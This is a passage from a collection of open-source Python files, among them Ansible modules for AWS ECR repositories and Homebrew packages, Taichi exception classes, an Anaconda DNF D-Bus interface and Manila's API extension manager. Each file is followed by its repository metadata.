if code == 'RepositoryPolicyNotFoundException':
return None
raise
def create_repository(self, registry_id, name):
if not self.check_mode:
repo = self.ecr.create_repository(
repositoryName=name, **build_kwargs(registry_id)).get(
'repository')
self.changed = True
return repo
else:
self.skipped = True
return dict(repositoryName=name)
def set_repository_policy(self, registry_id, name, policy_text, force):
if not self.check_mode:
policy = self.ecr.set_repository_policy(
repositoryName=name,
policyText=policy_text,
force=force,
**build_kwargs(registry_id))
self.changed = True
return policy
else:
self.skipped = True
if self.get_repository(registry_id, name) is None:
printable = name
if registry_id:
printable = '{}:{}'.format(registry_id, name)
raise Exception(
'could not find repository {}'.format(printable))
return
def delete_repository(self, registry_id, name):
if not self.check_mode:
repo = self.ecr.delete_repository(
repositoryName=name, **build_kwargs(registry_id))
self.changed = True
return repo
else:
repo = self.get_repository(registry_id, name)
if repo:
self.skipped = True
return repo
return None
def delete_repository_policy(self, registry_id, name):
if not self.check_mode:
policy = self.ecr.delete_repository_policy(
repositoryName=name, **build_kwargs(registry_id))
self.changed = True
return policy
else:
policy = self.get_repository_policy(registry_id, name)
if policy:
self.skipped = True
return policy
return None
def run(ecr, params, verbosity):
# type: (EcsEcr, dict, int) -> Tuple[bool, dict]
result = {}
try:
name = params['name']
state = params['state']
policy_text = params['policy']
delete_policy = params['delete_policy']
registry_id = params['registry_id']
force_set_policy = params['force_set_policy']
# If a policy was given, parse it
policy = policy_text and json.loads(policy_text)
result['state'] = state
result['created'] = False
repo = ecr.get_repository(registry_id, name)
if state == 'present':
result['created'] = False
if not repo:
repo = ecr.create_repository(registry_id, name)
result['changed'] = True
result['created'] = True
result['repository'] = repo
if delete_policy:
original_policy = ecr.get_repository_policy(registry_id, name)
if verbosity >= 2:
result['policy'] = None
if verbosity >= 3:
result['original_policy'] = original_policy
if original_policy:
ecr.delete_repository_policy(registry_id, name)
result['changed'] = True
elif policy_text is not None:
try:
policy = sort_json_policy_dict(policy)
if verbosity >= 2:
result['policy'] = policy
original_policy = ecr.get_repository_policy(
registry_id, name)
if original_policy:
original_policy = sort_json_policy_dict(original_policy)
if verbosity >= 3:
result['original_policy'] = original_policy
if original_policy != policy:
ecr.set_repository_policy(
registry_id, name, policy_text, force_set_policy)
result['changed'] = True
except:
# Some failure w/ the policy. It's helpful to know what the
# policy is.
result['policy'] = policy_text
raise
elif state == 'absent':
result['name'] = name
if repo:
ecr.delete_repository(registry_id, name)
result['changed'] = True
except Exception as err:
msg = str(err)
if isinstance(err, ClientError):
msg = boto_exception(err)
result['msg'] = msg
result['exception'] = traceback.format_exc()
return False, result
if ecr.skipped:
result['skipped'] = True
if ecr.changed:
result['changed'] = True
return True, result
def main():
argument_spec = ec2_argument_spec()
argument_spec.update(dict(
name=dict(required=True),
registry_id=dict(required=False),
state=dict(required=False, choices=['present', 'absent'],
default='present'),
force_set_policy=dict(required=False, type='bool', default=False),
policy=dict(required=False, type='json'),
delete_policy=dict(required=False, type='bool')))
module = AnsibleModule(argument_spec=argument_spec,
supports_check_mode=True,
mutually_exclusive=[
['policy', 'delete_policy']])
if not HAS_BOTO3:
module.fail_json(msg='boto3 required for this module')
ecr = EcsEcr(module)
passed, result = run(ecr, module.params, module._verbosity)
if passed:
module.exit_json(**result)
else:
module.fail_json(**result)
if __name__ == '__main__':
main()
|
e-gob/plataforma-kioscos-autoatencion
|
scripts/ansible-play/.venv/lib/python2.7/site-packages/ansible/modules/cloud/amazon/ecs_ecr.py
|
Python
|
bsd-3-clause
| 11,534
|
from nltk.corpus import stopwords
import nltk, string
__author__ = 'Jasneet Sabharwal'
def pre_process(phrase):
#phrase = phrase.lower()
#phrase = phrase.translate(None, string.punctuation)
tokens = nltk.word_tokenize(phrase)
#clean_tokens = [token for token in tokens if not token in stopwords.words(
# 'english')]
return tokens
|
KonceptGeek/KaggleSentimentAnalysis
|
src/preprocessing/preProcess.py
|
Python
|
gpl-2.0
| 359
|
from taichi._lib import core
class TaichiCompilationError(Exception):
"""Base class for all compilation exceptions.
"""
pass
class TaichiSyntaxError(TaichiCompilationError, SyntaxError):
"""Thrown when a syntax error is found during compilation.
"""
pass
class TaichiNameError(TaichiCompilationError, NameError):
"""Thrown when an undefine name is found during compilation.
"""
pass
class TaichiTypeError(TaichiCompilationError, TypeError):
"""Thrown when a type mismatch is found during compilation.
"""
pass
class TaichiRuntimeError(RuntimeError):
"""Thrown when the compiled program cannot be executed due to unspecified reasons.
"""
pass
class TaichiRuntimeTypeError(TaichiRuntimeError, TypeError):
def __init__(self, pos, needed, provided):
message = f'Argument {pos} (type={provided}) cannot be converted into required type {needed}'
super().__init__(message)
def handle_exception_from_cpp(exc):
if isinstance(exc, core.TaichiTypeError):
return TaichiTypeError(str(exc))
if isinstance(exc, core.TaichiSyntaxError):
return TaichiSyntaxError(str(exc))
return exc
__all__ = [
'TaichiSyntaxError', 'TaichiTypeError', 'TaichiCompilationError',
'TaichiNameError', 'TaichiRuntimeError', 'TaichiRuntimeTypeError'
]
|
yuanming-hu/taichi
|
python/taichi/lang/exception.py
|
Python
|
mit
| 1,345
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
# (c) 2013, Andrew Dunham <andrew@du.nham.ca>
# (c) 2013, Daniel Jaouen <dcj24@cornell.edu>
#
# Based on macports (Jimmy Tang <jcftang@gmail.com>)
#
# This module is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This software is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this software. If not, see <http://www.gnu.org/licenses/>.
DOCUMENTATION = '''
---
module: homebrew
author: Andrew Dunham and Daniel Jaouen
short_description: Package manager for Homebrew
description:
- Manages Homebrew packages
version_added: "1.1"
options:
name:
description:
- name of package to install/remove
required: true
state:
description:
- state of the package
choices: [ 'head', 'latest', 'present', 'absent', 'linked', 'unlinked' ]
required: false
default: present
update_homebrew:
description:
- update homebrew itself first
required: false
default: "no"
choices: [ "yes", "no" ]
upgrade_all:
description:
- upgrade all homebrew packages
required: false
default: no
choices: [ "yes", "no" ]
install_options:
description:
- options flags to install a package
required: false
default: null
version_added: "1.4"
notes: []
'''
EXAMPLES = '''
- homebrew: name=foo state=present
- homebrew: name=foo state=present update_homebrew=yes
- homebrew: name=foo state=latest update_homebrew=yes
- homebrew: update_homebrew=yes upgrade_all=yes
- homebrew: name=foo state=head
- homebrew: name=foo state=linked
- homebrew: name=foo state=absent
- homebrew: name=foo,bar state=absent
- homebrew: name=foo state=present install_options=with-baz,enable-debug
'''
import os.path
import re
# exceptions -------------------------------------------------------------- {{{
class HomebrewException(Exception):
pass
# /exceptions ------------------------------------------------------------- }}}
# utils ------------------------------------------------------------------- {{{
def _create_regex_group(s):
lines = (line.strip() for line in s.split('\n') if line.strip())
chars = filter(None, (line.split('#')[0].strip() for line in lines))
group = r'[^' + r''.join(chars) + r']'
return re.compile(group)
# /utils ------------------------------------------------------------------ }}}
class Homebrew(object):
'''A class to manage Homebrew packages.'''
# class regexes ------------------------------------------------ {{{
VALID_PATH_CHARS = r'''
\w # alphanumeric characters (i.e., [a-zA-Z0-9_])
\s # spaces
: # colons
{sep} # the OS-specific path separator
. # dots
- # dashes
'''.format(sep=os.path.sep)
VALID_BREW_PATH_CHARS = r'''
\w # alphanumeric characters (i.e., [a-zA-Z0-9_])
\s # spaces
{sep} # the OS-specific path separator
. # dots
- # dashes
'''.format(sep=os.path.sep)
VALID_PACKAGE_CHARS = r'''
\w # alphanumeric characters (i.e., [a-zA-Z0-9_])
. # dots
/ # slash (for taps)
\+ # plusses
- # dashes
'''
INVALID_PATH_REGEX = _create_regex_group(VALID_PATH_CHARS)
INVALID_BREW_PATH_REGEX = _create_regex_group(VALID_BREW_PATH_CHARS)
INVALID_PACKAGE_REGEX = _create_regex_group(VALID_PACKAGE_CHARS)
# /class regexes ----------------------------------------------- }}}
# class validations -------------------------------------------- {{{
@classmethod
def valid_path(cls, path):
'''
`path` must be one of:
- list of paths
- a string containing only:
- alphanumeric characters
- dashes
- dots
- spaces
- colons
- os.path.sep
'''
if isinstance(path, basestring):
return not cls.INVALID_PATH_REGEX.search(path)
try:
iter(path)
except TypeError:
return False
else:
paths = path
return all(cls.valid_brew_path(path_) for path_ in paths)
@classmethod
def valid_brew_path(cls, brew_path):
'''
`brew_path` must be one of:
- None
- a string containing only:
- alphanumeric characters
- dashes
- dots
- spaces
- os.path.sep
'''
if brew_path is None:
return True
return (
isinstance(brew_path, basestring)
and not cls.INVALID_BREW_PATH_REGEX.search(brew_path)
)
@classmethod
def valid_package(cls, package):
'''A valid package is either None or alphanumeric.'''
if package is None:
return True
return (
isinstance(package, basestring)
and not cls.INVALID_PACKAGE_REGEX.search(package)
)
@classmethod
def valid_state(cls, state):
'''
A valid state is one of:
- None
- installed
- upgraded
- head
- linked
- unlinked
- absent
'''
if state is None:
return True
else:
return (
isinstance(state, basestring)
and state.lower() in (
'installed',
'upgraded',
'head',
'linked',
'unlinked',
'absent',
)
)
@classmethod
def valid_module(cls, module):
'''A valid module is an instance of AnsibleModule.'''
return isinstance(module, AnsibleModule)
# /class validations ------------------------------------------- }}}
# class properties --------------------------------------------- {{{
@property
def module(self):
return self._module
@module.setter
def module(self, module):
if not self.valid_module(module):
self._module = None
self.failed = True
self.message = 'Invalid module: {0}.'.format(module)
raise HomebrewException(self.message)
else:
self._module = module
return module
@property
def path(self):
return self._path
@path.setter
def path(self, path):
if not self.valid_path(path):
self._path = []
self.failed = True
self.message = 'Invalid path: {0}.'.format(path)
raise HomebrewException(self.message)
else:
if isinstance(path, basestring):
self._path = path.split(':')
else:
self._path = path
return path
@property
def brew_path(self):
return self._brew_path
@brew_path.setter
def brew_path(self, brew_path):
if not self.valid_brew_path(brew_path):
self._brew_path = None
self.failed = True
self.message = 'Invalid brew_path: {0}.'.format(brew_path)
raise HomebrewException(self.message)
else:
self._brew_path = brew_path
return brew_path
@property
def params(self):
return self._params
@params.setter
def params(self, params):
self._params = self.module.params
return self._params
@property
def current_package(self):
return self._current_package
@current_package.setter
def current_package(self, package):
if not self.valid_package(package):
self._current_package = None
self.failed = True
self.message = 'Invalid package: {0}.'.format(package)
raise HomebrewException(self.message)
else:
self._current_package = package
return package
# /class properties -------------------------------------------- }}}
def __init__(self, module, path=None, packages=None, state=None,
update_homebrew=False, upgrade_all=False,
install_options=None):
if not install_options:
install_options = list()
self._setup_status_vars()
self._setup_instance_vars(module=module, path=path, packages=packages,
state=state, update_homebrew=update_homebrew,
upgrade_all=upgrade_all,
install_options=install_options, )
self._prep()
# prep --------------------------------------------------------- {{{
def _setup_status_vars(self):
self.failed = False
self.changed = False
self.changed_count = 0
self.unchanged_count = 0
self.message = ''
def _setup_instance_vars(self, **kwargs):
for key, val in kwargs.iteritems():
setattr(self, key, val)
def _prep(self):
self._prep_path()
self._prep_brew_path()
def _prep_path(self):
if not self.path:
self.path = ['/usr/local/bin']
def _prep_brew_path(self):
if not self.module:
self.brew_path = None
self.failed = True
self.message = 'AnsibleModule not set.'
raise HomebrewException(self.message)
self.brew_path = self.module.get_bin_path(
'brew',
required=True,
opt_dirs=self.path,
)
if not self.brew_path:
self.brew_path = None
self.failed = True
self.message = 'Unable to locate homebrew executable.'
raise HomebrewException('Unable to locate homebrew executable.')
return self.brew_path
def _status(self):
return (self.failed, self.changed, self.message)
# /prep -------------------------------------------------------- }}}
def run(self):
try:
self._run()
except HomebrewException:
pass
if not self.failed and (self.changed_count + self.unchanged_count > 1):
self.message = "Changed: %d, Unchanged: %d" % (
self.changed_count,
self.unchanged_count,
)
(failed, changed, message) = self._status()
return (failed, changed, message)
# checks ------------------------------------------------------- {{{
def _current_package_is_installed(self):
if not self.valid_package(self.current_package):
self.failed = True
self.message = 'Invalid package: {0}.'.format(self.current_package)
raise HomebrewException(self.message)
cmd = [
"{brew_path}".format(brew_path=self.brew_path),
"info",
self.current_package,
]
rc, out, err = self.module.run_command(cmd)
for line in out.split('\n'):
if (
re.search(r'Built from source', line)
or re.search(r'Poured from bottle', line)
):
return True
return False
def _outdated_packages(self):
rc, out, err = self.module.run_command([
self.brew_path,
'outdated',
])
return [line.split(' ')[0].strip() for line in out.split('\n') if line]
def _current_package_is_outdated(self):
if not self.valid_package(self.current_package):
return False
return self.current_package in self._outdated_packages()
def _current_package_is_installed_from_head(self):
if not Homebrew.valid_package(self.current_package):
return False
elif not self._current_package_is_installed():
return False
rc, out, err = self.module.run_command([
self.brew_path,
'info',
self.current_package,
])
try:
version_info = [line for line in out.split('\n') if line][0]
except IndexError:
return False
return version_info.split(' ')[-1] == 'HEAD'
# /checks ------------------------------------------------------ }}}
# commands ----------------------------------------------------- {{{
def _run(self):
if self.update_homebrew:
self._update_homebrew()
if self.upgrade_all:
self._upgrade_all()
if self.packages:
if self.state == 'installed':
return self._install_packages()
elif self.state == 'upgraded':
return self._upgrade_packages()
elif self.state == 'head':
return self._install_packages()
elif self.state == 'linked':
return self._link_packages()
elif self.state == 'unlinked':
return self._unlink_packages()
elif self.state == 'absent':
return self._uninstall_packages()
# updated -------------------------------- {{{
def _update_homebrew(self):
rc, out, err = self.module.run_command([
self.brew_path,
'update',
])
if rc == 0:
if out and isinstance(out, basestring):
already_updated = any(
re.search(r'Already up-to-date.', s.strip(), re.IGNORECASE)
for s in out.split('\n')
if s
)
if not already_updated:
self.changed = True
self.message = 'Homebrew updated successfully.'
else:
self.message = 'Homebrew already up-to-date.'
return True
else:
self.failed = True
self.message = err.strip()
raise HomebrewException(self.message)
# /updated ------------------------------- }}}
# _upgrade_all --------------------------- {{{
def _upgrade_all(self):
rc, out, err = self.module.run_command([
self.brew_path,
'upgrade',
])
if rc == 0:
if not out:
self.message = 'Homebrew packages already upgraded.'
else:
self.changed = True
self.message = 'Homebrew upgraded.'
return True
else:
self.failed = True
self.message = err.strip()
raise HomebrewException(self.message)
# /_upgrade_all -------------------------- }}}
# installed ------------------------------ {{{
def _install_current_package(self):
if not self.valid_package(self.current_package):
self.failed = True
self.message = 'Invalid package: {0}.'.format(self.current_package)
raise HomebrewException(self.message)
if self._current_package_is_installed():
self.unchanged_count += 1
self.message = 'Package already installed: {0}'.format(
self.current_package,
)
return True
if self.module.check_mode:
self.changed = True
self.message = 'Package would be installed: {0}'.format(
self.current_package
)
raise HomebrewException(self.message)
if self.state == 'head':
head = '--HEAD'
else:
head = None
opts = (
[self.brew_path, 'install']
+ self.install_options
+ [self.current_package, head]
)
cmd = [opt for opt in opts if opt]
rc, out, err = self.module.run_command(cmd)
if self._current_package_is_installed():
self.changed_count += 1
self.changed = True
self.message = 'Package installed: {0}'.format(self.current_package)
return True
else:
self.failed = True
self.message = err.strip()
raise HomebrewException(self.message)
def _install_packages(self):
for package in self.packages:
self.current_package = package
self._install_current_package()
return True
# /installed ----------------------------- }}}
# upgraded ------------------------------- {{{
def _upgrade_current_package(self):
command = 'upgrade'
if not self.valid_package(self.current_package):
self.failed = True
self.message = 'Invalid package: {0}.'.format(self.current_package)
raise HomebrewException(self.message)
if not self._current_package_is_installed():
command = 'install'
if self._current_package_is_installed() and not self._current_package_is_outdated():
self.message = 'Package is already upgraded: {0}'.format(
self.current_package,
)
self.unchanged_count += 1
return True
if self.module.check_mode:
self.changed = True
self.message = 'Package would be upgraded: {0}'.format(
self.current_package
)
raise HomebrewException(self.message)
opts = (
[self.brew_path, command]
+ self.install_options
+ [self.current_package]
)
cmd = [opt for opt in opts if opt]
rc, out, err = self.module.run_command(cmd)
if self._current_package_is_installed() and not self._current_package_is_outdated():
self.changed_count += 1
self.changed = True
self.message = 'Package upgraded: {0}'.format(self.current_package)
return True
else:
self.failed = True
self.message = err.strip()
raise HomebrewException(self.message)
def _upgrade_all_packages(self):
opts = (
[self.brew_path, 'upgrade']
+ self.install_options
)
cmd = [opt for opt in opts if opt]
rc, out, err = self.module.run_command(cmd)
if rc == 0:
self.changed = True
self.message = 'All packages upgraded.'
return True
else:
self.failed = True
self.message = err.strip()
raise HomebrewException(self.message)
def _upgrade_packages(self):
if not self.packages:
self._upgrade_all_packages()
else:
for package in self.packages:
self.current_package = package
self._upgrade_current_package()
return True
# /upgraded ------------------------------ }}}
# uninstalled ---------------------------- {{{
def _uninstall_current_package(self):
if not self.valid_package(self.current_package):
self.failed = True
self.message = 'Invalid package: {0}.'.format(self.current_package)
raise HomebrewException(self.message)
if not self._current_package_is_installed():
self.unchanged_count += 1
self.message = 'Package already uninstalled: {0}'.format(
self.current_package,
)
return True
if self.module.check_mode:
self.changed = True
self.message = 'Package would be uninstalled: {0}'.format(
self.current_package
)
raise HomebrewException(self.message)
opts = (
[self.brew_path, 'uninstall']
+ self.install_options
+ [self.current_package]
)
cmd = [opt for opt in opts if opt]
rc, out, err = self.module.run_command(cmd)
if not self._current_package_is_installed():
self.changed_count += 1
self.changed = True
self.message = 'Package uninstalled: {0}'.format(self.current_package)
return True
else:
self.failed = True
self.message = err.strip()
raise HomebrewException(self.message)
def _uninstall_packages(self):
for package in self.packages:
self.current_package = package
self._uninstall_current_package()
return True
# /uninstalled ----------------------------- }}}
# linked --------------------------------- {{{
def _link_current_package(self):
if not self.valid_package(self.current_package):
self.failed = True
self.message = 'Invalid package: {0}.'.format(self.current_package)
raise HomebrewException(self.message)
if not self._current_package_is_installed():
self.failed = True
self.message = 'Package not installed: {0}.'.format(self.current_package)
raise HomebrewException(self.message)
if self.module.check_mode:
self.changed = True
self.message = 'Package would be linked: {0}'.format(
self.current_package
)
raise HomebrewException(self.message)
opts = (
[self.brew_path, 'link']
+ self.install_options
+ [self.current_package]
)
cmd = [opt for opt in opts if opt]
rc, out, err = self.module.run_command(cmd)
if rc == 0:
self.changed_count += 1
self.changed = True
self.message = 'Package linked: {0}'.format(self.current_package)
return True
else:
self.failed = True
self.message = 'Package could not be linked: {0}.'.format(self.current_package)
raise HomebrewException(self.message)
def _link_packages(self):
for package in self.packages:
self.current_package = package
self._link_current_package()
return True
# /linked -------------------------------- }}}
# unlinked ------------------------------- {{{
def _unlink_current_package(self):
if not self.valid_package(self.current_package):
self.failed = True
self.message = 'Invalid package: {0}.'.format(self.current_package)
raise HomebrewException(self.message)
if not self._current_package_is_installed():
self.failed = True
self.message = 'Package not installed: {0}.'.format(self.current_package)
raise HomebrewException(self.message)
if self.module.check_mode:
self.changed = True
self.message = 'Package would be unlinked: {0}'.format(
self.current_package
)
raise HomebrewException(self.message)
opts = (
[self.brew_path, 'unlink']
+ self.install_options
+ [self.current_package]
)
cmd = [opt for opt in opts if opt]
rc, out, err = self.module.run_command(cmd)
if rc == 0:
self.changed_count += 1
self.changed = True
self.message = 'Package unlinked: {0}'.format(self.current_package)
return True
else:
self.failed = True
self.message = 'Package could not be unlinked: {0}.'.format(self.current_package)
raise HomebrewException(self.message)
def _unlink_packages(self):
for package in self.packages:
self.current_package = package
self._unlink_current_package()
return True
# /unlinked ------------------------------ }}}
# /commands ---------------------------------------------------- }}}
def main():
module = AnsibleModule(
argument_spec=dict(
name=dict(aliases=["pkg"], required=False),
path=dict(required=False),
state=dict(
default="present",
choices=[
"present", "installed",
"latest", "upgraded", "head",
"linked", "unlinked",
"absent", "removed", "uninstalled",
],
),
update_homebrew=dict(
default="no",
aliases=["update-brew"],
type='bool',
),
upgrade_all=dict(
default="no",
aliases=["upgrade"],
type='bool',
),
install_options=dict(
default=None,
aliases=['options'],
type='list',
)
),
supports_check_mode=True,
)
p = module.params
if p['name']:
packages = p['name'].split(',')
else:
packages = None
path = p['path']
if path:
path = path.split(':')
else:
path = ['/usr/local/bin']
state = p['state']
if state in ('present', 'installed'):
state = 'installed'
if state in ('head', ):
state = 'head'
if state in ('latest', 'upgraded'):
state = 'upgraded'
if state == 'linked':
state = 'linked'
if state == 'unlinked':
state = 'unlinked'
if state in ('absent', 'removed', 'uninstalled'):
state = 'absent'
update_homebrew = p['update_homebrew']
upgrade_all = p['upgrade_all']
p['install_options'] = p['install_options'] or []
install_options = ['--{0}'.format(install_option)
for install_option in p['install_options']]
brew = Homebrew(module=module, path=path, packages=packages,
state=state, update_homebrew=update_homebrew,
upgrade_all=upgrade_all, install_options=install_options)
(failed, changed, message) = brew.run()
if failed:
module.fail_json(msg=message)
else:
module.exit_json(changed=changed, msg=message)
# this is magic, see lib/ansible/module_common.py
#<<INCLUDE_ANSIBLE_MODULE_COMMON>>
main()
|
mattbernst/polyhartree
|
support/ansible/modules/extras/packaging/os/homebrew.py
|
Python
|
gpl-3.0
| 26,616
|
#
# DBus interface for DNF payload.
#
# Copyright (C) 2019 Red Hat, Inc.
#
# This copyrighted material is made available to anyone wishing to use,
# modify, copy, or redistribute it subject to the terms and conditions of
# the GNU General Public License v.2, or (at your option) any later version.
# This program is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY expressed or implied, including the implied warranties of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General
# Public License for more details. You should have received a copy of the
# GNU General Public License along with this program; if not, write to the
# Free Software Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA
# 02110-1301, USA. Any Red Hat trademarks that are incorporated in the
# source code or documentation are not subject to the GNU General Public
# License and may only be used or replicated with the express permission of
# Red Hat, Inc.
#
from dasbus.server.interface import dbus_interface
from dasbus.server.property import emits_properties_changed
from dasbus.typing import * # pylint: disable=wildcard-import
from pyanaconda.modules.common.constants.interfaces import PAYLOAD_DNF
from pyanaconda.modules.common.structures.payload import RepoConfigurationData
from pyanaconda.modules.common.structures.packages import PackagesConfigurationData, \
PackagesSelectionData
from pyanaconda.modules.payloads.payload.payload_base_interface import PayloadBaseInterface
__all__ = ["DNFInterface"]
@dbus_interface(PAYLOAD_DNF.interface_name)
class DNFInterface(PayloadBaseInterface):
"""DBus interface for DNF payload module."""
def connect_signals(self):
"""Connect the signals."""
super().connect_signals()
self.watch_property(
"PackagesConfiguration",
self.implementation.packages_configuration_changed
)
self.watch_property(
"PackagesSelection",
self.implementation.packages_selection_changed
)
@property
def PackagesConfiguration(self) -> Structure:
"""The packages configuration.
:return: a structure of the type PackagesConfigurationData
"""
return PackagesConfigurationData.to_structure(
self.implementation.packages_configuration
)
@emits_properties_changed
def SetPackagesConfiguration(self, data: Structure):
"""Set the packages configuration.
:param data: a structure of the type PackagesConfigurationData
"""
self.implementation.set_packages_configuration(
PackagesConfigurationData.from_structure(data)
)
@property
def PackagesSelection(self) -> Structure:
"""The packages selection.
:return: a structure of the type PackagesSelectionData
"""
return PackagesSelectionData.to_structure(
self.implementation.packages_selection
)
@emits_properties_changed
def SetPackagesSelection(self, data: Structure):
"""Set the packages selection.
:param: a structure of the type PackagesSelectionData
"""
self.implementation.set_packages_selection(
PackagesSelectionData.from_structure(data)
)
@property
def PackagesKickstarted(self) -> Bool:
"""Are the packages set from a kickstart?
FIXME: This is a temporary property.
:return: True or False
"""
return self.implementation.packages_kickstarted
def GetRepoConfigurations(self) -> List[Structure]:
"""Get RepoConfigurationData structures for all attached sources.
FIXME: This is a temporary solution. Will be removed after DNF payload logic is moved.
"""
return RepoConfigurationData.to_structure_list(
self.implementation.get_repo_configurations()
)
|
jkonecny12/anaconda
|
pyanaconda/modules/payloads/payload/dnf/dnf_interface.py
|
Python
|
gpl-2.0
| 3,918
|
# Copyright 2011 OpenStack LLC.
# Copyright 2011 Justin Santa Barbara
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import os
from oslo_config import cfg
from oslo_log import log
from oslo_utils import importutils
import six
import webob.dec
import webob.exc
import manila.api.openstack
from manila.api.openstack import wsgi
from manila import exception
from manila.i18n import _LE, _LI, _LW
import manila.policy
CONF = cfg.CONF
LOG = log.getLogger(__name__)
class ExtensionDescriptor(object):
"""Base class that defines the contract for extensions.
Note that you don't have to derive from this class to have a valid
extension; it is purely a convenience.
"""
# The name of the extension, e.g., 'Fox In Socks'
name = None
# The alias for the extension, e.g., 'FOXNSOX'
alias = None
# Description comes from the docstring for the class
# The timestamp when the extension was last updated, e.g.,
# '2011-01-22T13:25:27-06:00'
updated = None
def __init__(self, ext_mgr):
"""Register extension with the extension manager."""
ext_mgr.register(self)
self.ext_mgr = ext_mgr
def get_resources(self):
"""List of extensions.ResourceExtension extension objects.
Resources define new nouns, and are accessible through URLs.
"""
resources = []
return resources
def get_controller_extensions(self):
"""List of extensions.ControllerExtension extension objects.
Controller extensions are used to extend existing controllers.
"""
controller_exts = []
return controller_exts
class ExtensionsResource(wsgi.Resource):
def __init__(self, extension_manager):
self.extension_manager = extension_manager
super(ExtensionsResource, self).__init__(None)
def _translate(self, ext):
ext_data = {}
ext_data['name'] = ext.name
ext_data['alias'] = ext.alias
ext_data['description'] = ext.__doc__
ext_data['updated'] = ext.updated
ext_data['links'] = [] # TODO(dprince): implement extension links
return ext_data
def index(self, req):
extensions = []
for _alias, ext in self.extension_manager.extensions.items():
extensions.append(self._translate(ext))
return dict(extensions=extensions)
def show(self, req, id):
try:
# NOTE(dprince): the extensions alias is used as the 'id' for show
ext = self.extension_manager.extensions[id]
except KeyError:
raise webob.exc.HTTPNotFound()
return dict(extension=self._translate(ext))
def delete(self, req, id):
raise webob.exc.HTTPNotFound()
def create(self, req):
raise webob.exc.HTTPNotFound()
class ExtensionManager(object):
"""Load extensions from the configured extension path.
See manila/tests/api/extensions/foxinsocks/extension.py for an
example extension implementation.
"""
def __init__(self):
LOG.info(_LI('Initializing extension manager.'))
self.cls_list = CONF.osapi_share_extension
self.extensions = {}
self._load_extensions()
def is_loaded(self, alias):
return alias in self.extensions
def register(self, ext):
# Do nothing if the extension doesn't check out
if not self._check_extension(ext):
return
alias = ext.alias
LOG.info(_LI('Loaded extension: %s'), alias)
if alias in self.extensions:
raise exception.Error("Found duplicate extension: %s" % alias)
self.extensions[alias] = ext
def get_resources(self):
"""Returns a list of ResourceExtension objects."""
resources = []
resources.append(ResourceExtension('extensions',
ExtensionsResource(self)))
for ext in self.extensions.values():
try:
resources.extend(ext.get_resources())
except AttributeError:
# NOTE(dprince): Extension aren't required to have resource
# extensions
pass
return resources
def get_controller_extensions(self):
"""Returns a list of ControllerExtension objects."""
controller_exts = []
for ext in self.extensions.values():
try:
get_ext_method = ext.get_controller_extensions
except AttributeError:
# NOTE(Vek): Extensions aren't required to have
# controller extensions
continue
controller_exts.extend(get_ext_method())
return controller_exts
def _check_extension(self, extension):
"""Checks for required methods in extension objects."""
try:
LOG.debug('Ext name: %s', extension.name)
LOG.debug('Ext alias: %s', extension.alias)
LOG.debug('Ext description: %s',
' '.join(extension.__doc__.strip().split()))
LOG.debug('Ext updated: %s', extension.updated)
except AttributeError as ex:
LOG.exception(_LE("Exception loading extension: %s"),
six.text_type(ex))
return False
return True
def load_extension(self, ext_factory):
"""Execute an extension factory.
Loads an extension. The 'ext_factory' is the name of a
callable that will be imported and called with one
argument--the extension manager. The factory callable is
expected to call the register() method at least once.
"""
LOG.debug("Loading extension %s", ext_factory)
# Load the factory
factory = importutils.import_class(ext_factory)
# Call it
LOG.debug("Calling extension factory %s", ext_factory)
factory(self)
def _load_extensions(self):
"""Load extensions specified on the command line."""
extensions = list(self.cls_list)
# NOTE(thingee): Backwards compat for the old extension loader path.
# We can drop this post-grizzly in the H release.
old_contrib_path = ('manila.api.openstack.share.contrib.'
'standard_extensions')
new_contrib_path = 'manila.api.contrib.standard_extensions'
if old_contrib_path in extensions:
LOG.warning(_LW('osapi_share_extension is set to deprecated path: '
'%s.'),
old_contrib_path)
LOG.warning(_LW('Please set your flag or manila.conf settings for '
'osapi_share_extension to: %s.'), new_contrib_path)
extensions = [e.replace(old_contrib_path, new_contrib_path)
for e in extensions]
for ext_factory in extensions:
try:
self.load_extension(ext_factory)
except Exception as exc:
LOG.warning(_LW('Failed to load extension %(ext_factory)s: '
'%(exc)s.'),
{"ext_factory": ext_factory, "exc": exc})
class ControllerExtension(object):
"""Extend core controllers of manila OpenStack API.
Provide a way to extend existing manila OpenStack API core
controllers.
"""
def __init__(self, extension, collection, controller):
self.extension = extension
self.collection = collection
self.controller = controller
class ResourceExtension(object):
"""Add top level resources to the OpenStack API in manila."""
def __init__(self, collection, controller, parent=None,
collection_actions=None, member_actions=None,
custom_routes_fn=None):
if not collection_actions:
collection_actions = {}
if not member_actions:
member_actions = {}
self.collection = collection
self.controller = controller
self.parent = parent
self.collection_actions = collection_actions
self.member_actions = member_actions
self.custom_routes_fn = custom_routes_fn
def load_standard_extensions(ext_mgr, logger, path, package, ext_list=None):
"""Registers all standard API extensions."""
# Walk through all the modules in our directory...
our_dir = path[0]
for dirpath, dirnames, filenames in os.walk(our_dir):
# Compute the relative package name from the dirpath
relpath = os.path.relpath(dirpath, our_dir)
if relpath == '.':
relpkg = ''
else:
relpkg = '.%s' % '.'.join(relpath.split(os.sep))
# Now, consider each file in turn, only considering .py files
for fname in filenames:
root, ext = os.path.splitext(fname)
# Skip __init__ and anything that's not .py
if ext != '.py' or root == '__init__':
continue
# Try loading it
classname = "%s%s" % (root[0].upper(), root[1:])
classpath = ("%s%s.%s.%s" %
(package, relpkg, root, classname))
if ext_list is not None and classname not in ext_list:
logger.debug("Skipping extension: %s" % classpath)
continue
try:
ext_mgr.load_extension(classpath)
except Exception as exc:
logger.warning(_LW('Failed to load extension %(classpath)s: '
